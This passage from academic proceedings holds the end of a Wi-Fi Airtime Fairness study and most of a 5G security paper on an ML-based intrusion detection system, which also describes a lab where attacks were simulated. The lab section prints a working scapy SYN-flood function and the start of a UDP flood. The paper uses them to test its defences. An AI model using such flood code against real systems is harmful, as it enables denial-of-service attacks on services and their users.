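        total = sum(1 for _ in pyshark.FileCapture(pcap_path, display_filter="tcp"))
        repeated = sum(1 for _ in pyshark.FileCapture(
            pcap_path,
            display_filter="tcp.analysis.retransmission || tcp.analysis.duplicate_ack"))
        return repeated / total * 100

    # print(retransmission_percentage("day4_interval1.pcap"))  # hypothetical file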
Table 10. Percentage of TCP packets that were retransmitted over the wireless network

Day | Interval I | Interval II | Interval III
Day 1 | 9.00–10.00: 1,43% | 12.00–13.00: 1,38% | 13.00–14.00: 1,52%
Day 2 | 10.00–11.00: 1,46% | 13.00–14.00: 1,57% | 15.00–16.00: 1,51%
Day 3 | 9.00–10.00: 1,35% | 11.00–12.00: 1,61% | 14.00–15.00: 1,52%
Day 4 | 9.00–10.00: 1,41% | 12.00–13.00: 1,34% | 13.00–14.00: 1,36%
Day 5 | 10.00–11.00: 1,33% | 13.00–14.00: 1,31% | 15.00–16.00: 1,35%
Day 6 | 9.00–10.00: 1,38% | 11.00–12.00: 1,43% | 14.00–15.00: 1,41%
Fig. 6. Analysis of the number of retransmitted TCP packets
Table 11. Analysis of retransmitted TCP packets with the enabled Airtime Fairness technology

Data | Day 4 | Day 5 | Day 6
I time interval | −4,86% | −7,64% | −2,09%
II time interval | −9,27% | −11,92% | −6,62%
III time interval | −8,67% | −11,3% | −6%
5 Analysis of Wireless Channel Utilization Indicators

The main goal of Airtime Fairness technology is to provide all users of the wireless network with fair, time-defined access to the transmission medium. Therefore, the initial stage of the performance analysis is the optimization of the operation of user devices on the air and the reduction of wireless channel utilization by reducing the influence of outdated and slow devices. That is why, in addition to assessing packet performance and the probability of damaged packets, it is advisable to analyze the utilization of the radio channel, in order to capture the impact of the Airtime Fairness mechanism on all aspects of the wireless network that can be measured by an indirect method (without interfering with the physical layer of the transmission system). Since the percentage of utilization mainly depends on the packet and bit performance of the system, air utilization should be analyzed taking the current packet and bit performance into account [19].
Based on the data shown in Tables 2, 3, 4, 5, 6 and 7, the air utilization rate depends on the system performance indicators. However, it is impossible to single out a clear dependence, since the utilization rate is influenced by a large number of factors, including third-party ones that are not directly related to the system under study: for example, interference from the LTE network [20], weather radars, variable interference, reflections of the system's own signal, and the capabilities of user devices (support for MU-MIMO and for the fast roaming technologies of the 802.11 k/r/v standards [21], etc.). Since these additional factors, which can change the air utilization rate, cannot be eliminated, it is better to neglect them. Table 12 shows the average values of the utilization rate and the corresponding network performance for each of the days.

Table 12. Average values of the utilization rate depending on the network performance for each of the days

Data | Number of packets per second, pps | Traffic, kbps | Channel utilization, %
Day 1 | 1152,7 | 10999,9 | 17,22
Day 2 | 1200,1 | 11919 | 18,77
Day 3 | 1191 | 11317,3 | 17,7
Day 4 | 1213,43 | 11813,8 | 16,3
Day 5 | 1326,86 | 12525 | 17,12
Day 6 | 1259 | 12230 | 17,08
The average daily values were calculated on the basis of the data from Tables 2–7 according to Formula (9):

N_max = (N_add / B_max) · 100%,   (9)

where N_add = (N_9.00–10.00 + N_10.00–11.00 + … + N_15.00–16.00) / N_period is the number of transmitted packets over the selected periods averaged over the number of periods N_period, and B_max is the maximum theoretical value of productivity at 100% air utilization.
Since the main indicator of transmission system loading is the utilization of the wireless channel, for a qualitative assessment of the influence of Airtime Fairness technology on system performance it is advisable to determine the maximum theoretical value of system performance at the current value of channel utilization for each of the performance parameters (Fig. 7).
Fig. 7. Performance indicators of the wireless network assuming 100% channel utilization
Thus, using the table of performance and utilization indicators, the theoretical maximum performance indicators of the wireless network were determined under the assumption of 100% channel utilization.
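The extrapolation itself is a simple linear scaling of the measured values from Table 12 to a hypothetical 100% utilization; the computation below is an illustration, not a new measurement.

    # Linear extrapolation of Table 12 values to 100% channel utilization.
    days = {  # day: (traffic kbps, packets pps, utilization %)
        "Day 1": (10999.9, 1152.7, 17.22),
        "Day 4": (11813.8, 1213.43, 16.3),
    }
    for day, (kbps, pps, util) in days.items():
        print(day, round(kbps / util * 100), "kbps,", round(pps / util * 100), "pps")
    # Day 1 -> ~63879 kbps and ~6694 pps; Day 4 -> ~72477 kbps and ~7444 pps,
    # so the Airtime Fairness day extrapolates to a noticeably higher ceiling.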
6 Conclusions

The influence of Airtime Fairness technology on the performance and quality of a wireless Wi-Fi network of the IEEE 802.11ac standard has been investigated. Based on the calculations and the analysis of the data obtained in the study, the positive effect of the Airtime Fairness mechanisms on network performance has been demonstrated. In order to investigate the impact of Airtime Fairness technology comprehensively, the paper presents an analysis of three main indicators of the performance and quality of a wireless network. Compared to the reference week, the average daily increase in the traffic transfer rate was 8,78%. Along with the speed improvement, the percentage of damaged TCP traffic packets along the user-to-root-router path decreased by 7,77%. The Airtime Fairness algorithms optimized airtime utilization, which in turn increased the theoretical maximum performance at 100% air utilization by 13,6% for the traffic rate and by 13,88% for packets per second. However, a corporate network built in accordance with all modern requirements and standards does not reveal the full potential of the Airtime Fairness algorithms, and the results obtained fall short of the theoretically expected ones.
This is primarily caused by the redundancy of network resources. Secondly, it is due to the relative constancy of the user population and the sufficiently high signal levels at the users' equipment, allowing operation at channel speeds close to the maximum. Third, the basis for the study was a network operating under the IEEE 802.11ac standard, the latest and fastest widely deployed standard; that is why the influence of the technology's algorithms on overall network performance amounts to at most tens of percent. It has been shown that the use of Airtime Fairness technology is advisable in a classic corporate wireless network in which the coverage radius of a single access point is reduced through power control. Airtime Fairness technology will certainly be effective in HotSpot networks, which are built and operated according to the principles of maximum differentiation of user devices and limitation of Internet access speed. Users with modern devices and a high signal-to-noise ratio will receive the highest possible quality of service, while the problems of remote users and of users with outdated equipment are solved by increasing the density of the wireless network equipment. In addition, one of the key issues is the approximate or actual number of users on the network: in situations where a single access point serves 20 or more users, Airtime Fairness technology allows them to work as efficiently as possible despite the differences in the characteristics of their devices. The impact of Airtime Fairness technology, even in an unloaded network, indicates a significant optimization of the distribution of airtime between different users and proves its effectiveness.
References
1. Sanabria-Russo, L., Barcelo, J., Bellalta, B., Gringoli, F.: A high efficiency MAC protocol for WLANs: providing fairness in dense scenarios. IEEE/ACM Trans. Netw. 25(1), 492–505 (2017)
2. Lei, J., Tao, J., Huang, J., Xia, Y.: A differentiated reservation MAC protocol for achieving fairness and efficiency in multi-rate IEEE 802.11 WLANs. IEEE Access 7, 12133–12145 (2019). https://doi.org/10.1109/ACCESS.2019.2892760
3. Fang, Y., Doray, B., Issa, O.: A practical air time control strategy for Wi-Fi in diverse environment. In: Proceedings of the 2017 IEEE Wireless Communications and Networking Conference Workshops (WCNCW), pp. 1–6, San Francisco, CA, USA (2017). https://doi.org/10.1109/wcncw.2017.7919116
4. Høiland-Jørgensen, T., Kazior, M., Täht, D., Hurtig, P., Brunström, A.: Ending the anomaly: achieving low latency and airtime fairness in WiFi. In: USENIX Annual Technical Conference, Santa Clara, CA, USA, pp. 139–151 (2017)
5. Yu, S.I., Park, C.Y.: Responsible airtime approach for true time-based fairness in multi-rate WiFi networks. Sensors 18(11), 1–19 (2018). https://doi.org/10.3390/s18113658
6. Mao, Z., Jiang, Y., Di, X., Woldeyohannes, Y.: Joint head selection and airtime allocation for data dissemination in mobile social networks. Comput. Netw. 166, 1–15 (2019). https://doi.org/10.1016/j.comnet.2019.106990
7. Ayatollahi, H., Tapparello, C., Heinzelman, W.: MAC-LEAP: multi-antenna, cross layer, energy adaptive protocol. Ad Hoc Netw. 83, 91–110 (2019). https://doi.org/10.1016/j.adhoc.2018.09.005
8. Wang, J., Lang, P., Zhu, J., Deng, W., Shaoqing, X.: Application-value-awareness cross-layer MAC cooperative game for vehicular networks. Veh. Commun. 13, 27–37 (2018). https://doi.org/10.1016/j.vehcom.2018.04.001
9. Harkat, Y., Amrouche, A., Mohand, E.-S., Kechadid, T.: Modeling and performance analysis of the IEEE 802.11p EDCA mechanism for VANET under saturation traffic conditions and error-prone channel. Int. J. Electron. Commun. (AEU) 101, 33–43 (2019). https://doi.org/10.1016/j.aeue.2019.01.014
10. Denisov, D.: Technology Review Wi-Fi (2019)
11. Vikulov, A.S., Paramonov, A.I.: Introduction to Wi-Fi networks with high user density. Inf. Technol. Telecommun. 6(1), 12–20 (2018)
12. Chernega, V.S.: Estimation of the real capacity of computer Wi-Fi networks at the transport level. Tavricheskiy Sci. Obs. 3(20), 119–128 (2017)
13. Vikulov, A.S., Paramonov, A.I.: Frequency-territorial planning of Wi-Fi networks with high user density. Inf. Technol. Telecommun. 6(2), 35–48 (2018)
14. Tarasyuk, O., Gorbenko, A.: Performance enhancement in multirate Wi-Fi networks. J. Inf. Control Manag. Syst. 12(2), 141–152 (2014)
15. Zakharov, Y.: Are you ready to switch to Wave 2? J. Netw. Solut. LAN, Open Syst. Publ. House 11, 28–34 (2017)
16. Du, D., Zhang, C., Wang, H., Li, X., Hu, H., Yang, T.: Stability analysis of token-based wireless networked control systems under deception attacks. Inf. Sci. 1–30 (2018). https://doi.org/10.1016/j.ins.2018.04.085
17. Yen, L., Adege, A.B., Lin, H.-P., Ho, C.-H., Lever, K.: Deep learning approach on channel selection strategy for minimizing co-channel interference in unlicensed channels. Microelectron. Reliab. 105, 1–12 (2020). https://doi.org/10.1016/j.microrel.2019.113558
18. El-Jaafreh, Y.G.: Co-channel and adjacent channel interference calculations in cellular communication systems. J. King Saud Univ. Eng. Sci. 12(1), 153–167 (2000). https://doi.org/10.1016/S1018-3639(18)30711-6
19. Iqbal, S., Abdullah, A.H., Qureshi, K.N.: Channel quality and utilization metric for interference estimation in wireless mesh networks. Comput. Electr. Eng. 64, 420–435 (2017). https://doi.org/10.1016/j.compeleceng.2017.10.003
20. Baswade, A.M., Atif, T.A., Reddy Tamma, B., Franklin, A.: A novel coexistence scheme for IEEE 802.11 for user fairness and efficient spectrum utilization in the presence of LTE-U. Comput. Netw. 139, 1–18 (2018). https://doi.org/10.1016/j.comnet.2018.04.002
21. Moura, H., Alves, A.R., Borges, J.R.A., Macedo, D.F., Vieira, M.A.M.: Ethanol: a software-defined wireless networking architecture for IEEE 802.11 networks. Comput. Commun. 149, 176–188 (2020). https://doi.org/10.1016/j.comcom.2019.10.010
5G Security Function and Its Testing Environment

Maksim Iavich1, Sergiy Gnatyuk2, Giorgi Iashvili1(B), Roman Odarchenko2, and Sergei Simonov3

1 Caucasus University, Tbilisi, Georgia
[email protected]
2 National Aviation University, Kyiv, Ukraine
3 Scientific Cyber Security Association, Tbilisi, Georgia
Abstract. The volume of data sent through wireless networks is quickly increasing and depends on many factors. The most important among them is the tremendous growth in multimedia applications on mobile devices, which include, among other use cases, streaming music and video, two-way video conferencing and social networking. The telecommunications industry is currently undergoing significant changes in order to transition to 5G networks, which will better serve existing and emerging use cases. In 2020, the world consumed approximately three trillion minutes of Internet video per month, which is equivalent to five million years of video or one million video minutes per second. This underscores the need to upgrade from 4G to 5G in order to meet customer demands for better quality of service and enhanced data transmission security, ensuring stable and secure communication. The deployment of 5G services will require novel storage and processing technologies to support new networking models and efficient service deployment. However, once these technologies are in place, new problems will arise for the cybersecurity of 5G systems and their functionality. 5G security is being assessed by researchers, who have found that it still presents some security risks. These concerns arise for various reasons, including recent discoveries of vulnerabilities in 5G security systems. Attackers have been able to inject malicious code into the system and execute undesirable actions through attacks such as MNmap, MiTM and battery drain. To provide the highest levels of cybersecurity, new architectures for 5G and beyond networks should include novel AI/ML-based algorithms. This paper examines the existing vulnerabilities of the 5G ecosystem and proposes a new cybersecurity function that incorporates machine learning algorithms. The function integrates Firewall, Intrusion Detection and Intrusion Protection systems into an existing 5G architecture. The paper focuses on the Intrusion Detection System (IDS) and its methodology for identifying attacks such as MNmap, MiTM and battery drain. It also provides pseudocode for the algorithmic core and evaluates the efficiency of this approach. A test laboratory is created using a server and fifty Raspberry Pi hardware systems to simulate attacks on the server. The paper suggests an improvement strategy that will be implemented in future versions of the system.

Keywords: 5G · Security function · 5G security · Testing environment
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 656–678, 2023. https://doi.org/10.1007/978-3-031-35467-0_39
1 Introduction

As wireless networks handle an ever-increasing volume of traffic due to the proliferation of mobile devices, including the Internet of Things (IoT), the telecommunications industry is transitioning to 5G networks to meet the demands of emerging use cases. 5G networks promise high data rates, wider coverage, better Quality of Service (QoS), and ultra-low latency. However, this vision of 5G also presents unique challenges that require the development of novel networking architectures, service deployment models, and storage and processing technologies. These new technologies also pose challenges for 5G cybersecurity systems, necessitating their definition and development. One of the critical aspects of 5G security is the connection of critical infrastructures, which underscores the need to prioritize security to ensure the safety of society as a whole. For instance, a security breach in the online power supply system could have catastrophic consequences for the entire spectrum of electrical and electronic systems that society relies upon. Hence, it is imperative to thoroughly investigate and highlight the significant security challenges in 5G networks and provide an overview of potential solutions that can guide the design of secure 5G systems. Researchers and developers are diligently working towards securing 5G systems, and it is crucial to analyze the differences between 4G and 5G network security. With the increasing reliance on 5G technology, addressing cybersecurity concerns is paramount to safeguarding the integrity and resilience of the networks and the systems they connect.
Very often, new security problems arise along with new technological advancements. Even with the deployment of 5G technology, attacks that have been common since the inception of the Internet, such as man-in-the-middle, DoS and DDoS attacks, application-layer attacks and spoofing, remain possible. Modern technologies like 5G do not eliminate the possibility of such attacks.
2 Review of the Security Problems of the 5G Standard

According to recent research, 5G networks still have security problems, as highlighted in this paper. The following security issues have been identified:
1. 5G networks are more susceptible to software attacks due to their reliance on software configurations. Hackers can exploit security bugs and flaws to compromise the network's operation.
2. The architecture of 5G networks offers novel functionalities that make some functions and parts of the network equipment much more sensitive to attacks by hackers. Base stations and network key management functions are particularly vulnerable.
3. Mobile network operators depend on suppliers, which increases both the probability and the impact of attacks.
4. A major share of critical IT applications will have to use the 5G network, making them vulnerable to attacks on their availability and integrity.
5. The sheer number of devices that will be integrated into the 5G network has the potential to trigger various types of denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks.
6. The use of network slicing, a technique employed in 5G networks that permits the creation of multiple virtual networks within a single physical network, can pose security threats if hackers manage to force a device to use a slice not intended for it.

Recent research has brought to light vulnerabilities in 5G security systems which enable attackers to inject malicious code into the system and carry out unauthorized actions. These attacks can be classified into several categories. Some researchers have identified security vulnerabilities in 5G networks that could allow attackers to conduct various types of attacks. One such attack is MNmap, in which researchers were able to sniff information transmitted in plaintext and recreate a map of the connected devices, identifying the model, manufacturer and version of the devices, the operating system, and the type of device. Another type of attack is Man-in-the-Middle (MiTM), which can lead to bidding-down and battery drain attacks. In a MiTM attack, attackers can remove the MIMO enablement, a feature that significantly boosts the data transfer speed over the 5G network. The battery drain attack targets NB-IoT devices: an attacker modifies the PSM settings, causing continuous activity and a constant search for a network to connect to. This drains the battery even in energy-saving mode and may allow attackers to propose desirable networks to the potential victim and use the hardware maliciously. It is crucial to emphasize the need for new architectures for 5G and future networks to incorporate AI/ML algorithms that can provide robust cybersecurity measures to safeguard mobile subscribers, industries and governments. Based on the findings presented in this paper, we can conclude that 5G networks are susceptible to DoS, Probe and software-based attacks. To address these vulnerabilities, an intrusion detection system (IDS) has been developed using machine learning algorithms.
3 The Offered Approach

Our proposal involves the integration of a cybersecurity function into every 5G station as a separate server, which will include both a firewall and an IDS/IPS. A visual representation of the offered approach can be found in Fig. 1. It is important to highlight that our approach to resisting these types of attacks relies on the use of distinct datasets for the training process. The first one is NSL-KDD, which is widely recognized and commonly employed in research and in creating prototypes of intrusion detection systems; NSL-KDD is the most prevalent dataset used for calibrating anomaly detection systems.

3.1 NSL-KDD Dataset and DOS/DDOS2021 Dataset

The NSL-KDD dataset is derived from the data collected during the DARPA'98 IDS evaluation program. It encompasses approximately 4 gigabytes of raw tcpdump data obtained by capturing network traffic over a period of seven weeks [11–14]. Within this dataset, a two-week subset comprises roughly two million connection records.
Fig. 1. The cyber security module
Additionally, the complete dataset consists of roughly 5 million labeled samples, each classified as an attack or not. The attacks fall into four fundamental groups:
1. Denial of Service (DoS) attacks: the attacker sends so many requests that the computer cannot process legitimate users' requests.
2. User to Root (U2R) attacks involve an intruder gaining access to legitimate user account data (through methods such as sniffing or social engineering) and exploiting vulnerabilities within the system to attain full access.
3. Remote to Local (R2L) attacks: the hacker does not have access to an account on the machine but can send packets remotely to gain user access on the local machine.
4. Probing attacks: these attacks are used to collect data about networks in order to bypass their protection mechanisms.

The NSL-KDD dataset is split into training and test parts, consisting of twenty-four attack types and an additional fourteen attack types, respectively. The features within the dataset are grouped into three categories: basic, traffic and content features. Basic features include information gathered from TCP/IP connections, which can lead to delays during detection. Traffic features are divided into "same host" and "same service" groups, which calculate statistics related to protocol and service behavior. Content features focus on detecting Probing and DoS attacks, which need multiple connections in a short interval, while U2R and R2L attacks require only one connection.
The NSL-KDD dataset is split into four main parts: PROBE, DOS, U2R and R2L. The DOS part contains subcategories such as APACHE2, LAND, BACK, POD, NEPTUNE, SMURF, TEARDROP and MAILBOMB. The U2R part includes subcategories such as BUFFER_OVERFLOW, SQLATTACK and ROOTKIT. The R2L category includes subcategories such as FTP_WRITE, GUESS_PASSWD and SNMPGETATTACK, while the PROBE category includes subcategories such as IPSWEEP, NMAP and PORTSWEEP. The R2L and U2R parts include the vectors of software security attacks. Therefore, using the NSL-KDD dataset to train an IDS is relevant in the context of 5G and beyond networks, as it covers all attack vectors that can be filtered on such a network.
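As a hedged illustration of how such a dataset is typically prepared for training, the sketch below loads an NSL-KDD file with pandas and maps the fine-grained labels onto the four groups. The file name and the (shortened) label map are assumptions; the full set has 41 features plus the label.

    import pandas as pd

    # Shortened label map - the real mapping covers all NSL-KDD subcategories.
    ATTACK_GROUPS = {
        "neptune": "DOS", "smurf": "DOS", "teardrop": "DOS", "back": "DOS",
        "nmap": "PROBE", "ipsweep": "PROBE", "portsweep": "PROBE",
        "buffer_overflow": "U2R", "rootkit": "U2R",
        "guess_passwd": "R2L", "ftp_write": "R2L",
    }

    def load_nsl_kdd(path: str) -> pd.DataFrame:
        """Load a headerless NSL-KDD CSV (e.g. the usual KDDTrain+.txt)."""
        df = pd.read_csv(path, header=None)
        labels = df.iloc[:, 41]  # the label column follows the 41 features
        df["category"] = labels.map(lambda l: ATTACK_GROUPS.get(l, "normal"))
        # One-hot encode the symbolic features (protocol, service, flag).
        return pd.get_dummies(df, columns=[1, 2, 3])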
It must be mentioned that NSL-KDD is an old dataset, so we also propose to train the IDS using a recent DOS/DDOS dataset containing attacks collected during 2020 and 2021 [16–22]. The dataset includes data on the following DOS and DDOS attacks: 'MSSQL', 'NetBIOS', 'LDAP', 'UDP', 'Syn', 'Portmap' and 'UDPLag'. The size of the dataset is 1.2 GB. Another part of our approach is to integrate into the IDS the ability to protect against Battery drain, MNmap and MiTM attacks.

3.2 MNmap, MiTM and Battery Drain Attacks

MNmap
MNmap, which stands for "mobile network mapping", is an approach to generating a map of a 5G network that includes information about connected devices, e.g. addresses, vendors, signal strength, geolocation, etc. This attack has nothing in common with the famous software called "Nmap", which cybersecurity specialists and hackers use to probe networks. The attack is a consequence of MiTM, which we explain in the following subsection. When a device connects to a base station, it sends its metadata and other valuable information to the station, or the station can query the device for this data. In an MNmap attack, the attacker creates a base station or spoofs an existing one, urges clients to connect to it, thereby causing a MitM condition, and forces devices to send their metadata to the station. As a result of this passive reconnaissance, hackers obtain information about the victim's geolocation, operating system and other valuable data, which can further be used to obtain control over the victim's systems. The process is illustrated in Fig. 2.
Fig. 2. MNmap attack
MitM Attack
Recently, it was revealed that hackers can launch Man-in-the-Middle (MiTM) attacks on 5G infrastructure by creating fake base stations. Users unknowingly connect to these fake stations, which enables the attacker to intercept traffic and forward it to the legitimate base station or core layer, similar to spoofing the ESSID and BSSID of a Wi-Fi access point. This can result in the interception of sensitive information and of all traffic passing through the fake base station. In addition to the disclosure of private information, hackers may also manipulate information in real time. Another concerning issue is that hackers can pivot from the base station to the core segment or attempt to exploit unknown vulnerabilities. The process is illustrated in Fig. 3.
Fig. 3. MitM attack.
Battery Drain Attack
The battery drain attack is an application-layer attack which can cause severe damage to NB-IoT devices. NB-IoT, which stands for Narrowband IoT, is a standard developed by the 3GPP to grant access to the 5G network even in indoor environments, where the millimeter waves used by the 5G infrastructure are ineffective.
In PSM (Power Saving Mode), the integrated battery of these devices can last for approximately ten years. If the PSM parameter is altered somewhere between the client and the NB-IoT device, the battery lifetime is drastically reduced. This effectively causes a DoS (without a battery, the device cannot function) and can cause financial and physical damage to the device itself. The process is illustrated in Fig. 4.
Fig. 4. Battery drain attack
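A back-of-the-envelope calculation makes the severity clear. The figures below are assumed, order-of-magnitude values for illustration, not measurements of a specific NB-IoT device.

    # Illustrative battery-lifetime arithmetic for a PSM-capable device.
    CAPACITY_MAH = 5000               # assumed battery capacity
    SLEEP_MA, ACTIVE_MA = 0.007, 50   # assumed sleep vs. active current draw

    def lifetime_years(duty_cycle_active: float) -> float:
        avg_ma = duty_cycle_active * ACTIVE_MA + (1 - duty_cycle_active) * SLEEP_MA
        return CAPACITY_MAH / avg_ma / 24 / 365

    print(lifetime_years(0.001))  # PSM honoured: ~10 years
    print(lifetime_years(1.0))    # PSM disabled by the attacker: ~4 days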
Mitigation
It is evident that these three attacks share a common building block, namely the method of execution: the Man-in-the-Middle (MitM) attack. Therefore, the most feasible solution is to prevent hackers from creating fake base stations and spoofing legitimate ones, both of which involve manipulating information on the second layer of the OSI model. For instance, let us consider two Wi-Fi access points, one legitimate and the other spoofed. The setup would resemble the following:

Legit AP
BSSID – AA:BB:CC:DD:EE:FF
ESSID – CHECK

Spoofed AP
BSSID – AA:BB:CC:DD:EE:FF
ESSID – CHECK
As depicted in the example, both access points share the same addresses, making it challenging to distinguish the legitimate one from the spoofed one. One theoretical solution to this problem is to incorporate an additional antenna that continuously operates in monitoring mode and sends information about access points to a software program, which analyzes the data to detect any coincidence between the legitimate ESSID/BSSID and the information from the scanner. If a match is found more than once, it indicates that the access point is spoofed. However, this approach has a few limitations, such as the inability to detect spoofed devices that are out of the antenna's range. Nonetheless, this issue can be resolved by acquiring a rotating directional antenna or a more powerful isotropic antenna. The same approach can be used to identify spoofed 5G base stations. As for fake base stations, we can create a list of legitimate ones and share it across all base stations; if a base station that is not on the whitelist appears, it is a fake one. The process is illustrated in Fig. 5 (a code sketch follows the figure).
Fig. 5. Mitigation
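A minimal sketch of both detection ideas, assuming an airodump-style CSV produced by the monitoring antenna and a pre-shared station whitelist; the file format and function names are assumptions.

    import csv

    def detect_spoofing(scan_csv: str, legit_bssid: str, legit_essid: str) -> bool:
        """Count how many scanned access points advertise the protected
        BSSID/ESSID pair; more than one match indicates a spoofed AP."""
        bssid_count = essid_count = 0
        with open(scan_csv, newline="") as f:
            for row in csv.reader(f):
                line = ",".join(row)
                if legit_bssid in line:
                    bssid_count += 1
                if legit_essid in line:
                    essid_count += 1
        return bssid_count > 1 or essid_count > 1

    # The same whitelist idea for base stations: any station identifier
    # seen on the air that is absent from the shared whitelist is fake.
    def is_fake_station(seen_id: str, whitelist: set) -> bool:
        return seen_id not in whitelist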
4 The Offered Methodology

Our Intrusion Detection System (IDS) was trained using two datasets related to DoS and DDoS attacks: one contained the attack patterns of 2020 and the other those of 2021. Our system is also capable of mitigating Battery drain, MNmap and MiTM attacks. We utilized a classification algorithm and developed a multilayer neural network model trained on our data. The NSL-KDD dataset was divided into a training dataset (90%) and a test dataset (10%),
while the DOS/DDOS dataset was partitioned into training and test datasets containing 80% and 20% of the records, respectively. This partitioning produced the best accuracy results during training. The model was trained separately with each dataset, resulting in an accuracy of 0.9711049372916336 for the NSL-KDD dataset and 0.9998861703182078 for the DOS dataset. Once training was completed, the system remained idle and waited for input data from the network sniffer. The input data underwent an initial check for any attack patterns present in the NSL-KDD dataset; if an attack pattern was identified, it was transferred to the intrusion protection system (IPS). Simultaneously, the input data was also checked for any attack patterns from the DOS dataset and, if found, was also passed to the IPS. Additionally, the input data was checked for MNmap, MiTM and Battery drain attacks; any detected attacks were likewise forwarded to the IPS. In cases where no attack patterns were identified, the IDS reported that the analyzed traffic was not suspicious and proceeded to process the next input data block. The core of the IDS system is based on the following pseudocode:

class IDS:
    # import the required libraries

    # private members
    X = None       # first training variable (feature matrix)
    Y = None       # second training variable (labels)
    model = None   # NN model variable

    def __init__(self, file, model_t):
        # constructor: preprocess the data ...

    def make_model(self, model_t):
        # build the NN model
        return NN_model

    def model_train(self, data, model_t):
        # train the model
        return model

    def model_test(self, model, model_t):
        # test and measure the accuracy score
        return score

    # public interface
    def predict(self, data_x):
        # predict ...
        return prediction

    def accuracy_print(self, model_t):
        return self.model_test()
class MITM:
    # import the necessary libraries
    # print the task for choosing the interface

    def __init__(self):
        ints = get_interfaces()        # get the network interfaces
        for i in ints:
            print(i)                   # print the interfaces
        self.int = input()             # input the interface name
        self.ssid = input()            # input the SSID
        self.bssid = input()           # input the BSSID

    def air_scan(self):
        # scan the air for existing networks,
        # set the duration to ten seconds,
        # save the result to a CSV file

    def run_air_scan(self):
        self.air_scan()                # call the scanning function
        scan = read("scan.csv")        # read the CSV file
        bssidc = ssidc = 0
        for line in scan:
            if self.bssid in line:
                bssidc = bssidc + 1
            if self.ssid in line:
                ssidc = ssidc + 1
        print("BSSID COUNT: ", bssidc)
        print("ESSID COUNT: ", ssidc)

    def check(self):
        # compare bssidc and ssidc with one
        if bssidc > 1 or ssidc > 1:
            print("MITM detected")
        else:
            print("everything is ok")

# import the necessary libraries
concrete_IDS = IDS(df1)   # build the DOS prediction model
IDS_KDD = IDS(df2)        # build the KDD2020 prediction model
mitm = MITM()
process_wait(traffic)   # process that captures the traffic

def check_KDD():
    KDD = True
    if IDS_KDD.predict(df) == attack_KDD:
        IPS.response_KDD()
    else:
        KDD = False
    return KDD

def check_DOS():
    DOS = True
    if concrete_IDS.predict(df) == 'DOS_attack':
        IPS.response_dos()
    else:
        DOS = False
    return DOS

def check_MITM():
    MITM_F = True
    mitm.run_air_scan()
    if mitm.check() == 'MITM_attack':
        IPS.response_mitm()
    else:
        MITM_F = False
    return MITM_F

t1 = threading.Thread(target=check_KDD)
t2 = threading.Thread(target=check_DOS)
t3 = threading.Thread(target=check_MITM)
# start and join the threads

if DOS == False and MITM_F == False and KDD == False:
    print("There is no attack")
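For reference, a runnable counterpart of the pseudocode's training core might look as follows. Only the 90/10 split follows the text; the layer sizes, epochs and optimizer are assumptions, and the feature matrix is expected to be already preprocessed (e.g. as sketched in Sect. 3.1).

    import numpy as np
    from sklearn.model_selection import train_test_split
    from tensorflow import keras

    def train_ids_model(X: np.ndarray, y: np.ndarray) -> keras.Model:
        """Train a small multilayer network for binary attack detection."""
        X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.1)
        model = keras.Sequential([
            keras.layers.Input(shape=(X.shape[1],)),
            keras.layers.Dense(128, activation="relu"),
            keras.layers.Dense(64, activation="relu"),
            keras.layers.Dense(1, activation="sigmoid"),  # attack / normal
        ])
        model.compile(optimizer="adam", loss="binary_crossentropy",
                      metrics=["accuracy"])
        model.fit(X_tr, y_tr, epochs=10, batch_size=256, verbose=0)
        _, acc = model.evaluate(X_te, y_te, verbose=0)
        print("test accuracy:", acc)
        return model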
5 Laboratory

To validate our research findings, we required a specialized laboratory to conduct our experiments and to create a set of attack scenarios. The proposed laboratory setup includes a layer-two switch that provides basic connectivity between hosts, two access points, an IDS module for detecting spoofing, an attacker host, a defender server equipped with an IPS module, fifty Raspberry Pi devices for executing the attacks, and an equal number of 4G modems with SIM cards. A simplified model of the laboratory setup is shown below (Fig. 6):
Fig. 6. The model of the laboratory
It must be noted that the IDS does not support the 'pcap' format in which the traffic is captured. Therefore, it is necessary to convert the 'pcap' files into the 'NSL-KDD' and 'CICDDoS2021' formats supported by the IDS. Publicly available tools can be used for this purpose: to convert 'pcap' to 'NSL-KDD', we used the "Zeek" IDS together with the https://github.com/inigoperona/tcpdump2gureKDDCup99 tool, and to convert 'pcap' to 'CICDDoS2021' we used the official 'CICFlowMeter' tool. To create a testing environment, we utilized 'Oracle VirtualBox' as a host-based hypervisor, running two virtual instances of "Parrot OS" and two virtual instances of "Ubuntu 20.04" inside a virtual NAT network. To simulate reflected DoS attacks, we employed fifty Raspberry Pi nodes and captured and executed various attacks. One such attack was the TCP SYN flood attack (also known as Neptune), which exploits the way the TCP protocol guarantees that all data sent is delivered in one piece. TCP uses sequence numbers: one side sends a number (SYN) and the other side acknowledges it by returning an ACK plus its own SYN, which in turn has to be acknowledged by the first side. This process is known as the TCP three-way handshake and can be illustrated as follows (Fig. 7):
Fig. 7. TCP Syn flood attack
A hacker can flood the server with a large number of SYN requests to different TCP ports. The server replies to each with a SYN-ACK and waits for the final ACK to complete the three-way handshake, but never receives it; the server is thus induced to keep the connection open for some time, and even after the connection is closed, the server immediately receives a new SYN from the attacker's machine. This produces a large number of half-open connections, and eventually the server's memory is overflowed by SYN connections, causing a DoS. To perform this attack, the hping3 tool was used to send many SYN segments to the victim machine.

UDP Datagram Flood Attack - the UDP protocol is commonly used for VoIP and streaming, as it does not need handshakes and is much more efficient than TCP. A hacker can send a large number of UDP datagrams to random ports of the victim server. When the server tries to extract the application data from a datagram, it may find that no application is listening on that port, in which case it sends back a "destination unreachable" packet. Since UDP is a fast protocol, the server can quickly become overwhelmed by a large number of datagrams, leading to performance degradation. To perform this attack, the hping3 tool was used to send a large number of UDP datagrams to the victim's machine (Fig. 8; an illustrative scapy sketch is given after the figure).
Fig. 8. UDP datagram flood attack
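The floods above were generated with the hping3 CLI tool. For a programmatic lab setup, an equivalent sketch using scapy might look as follows; the target address is a placeholder inside the isolated test network, and this is for laboratory use only.

    from scapy.all import IP, TCP, UDP, RandShort, Raw, send

    def syn_flood(target: str, port: int, count: int = 10000):
        # Half-open connections: SYN is sent, the SYN-ACK is ignored,
        # so the victim holds each embryonic connection open.
        send(IP(dst=target) / TCP(sport=RandShort(), dport=port, flags="S"),
             count=count, verbose=0)

    def udp_flood(target: str, count: int = 10000):
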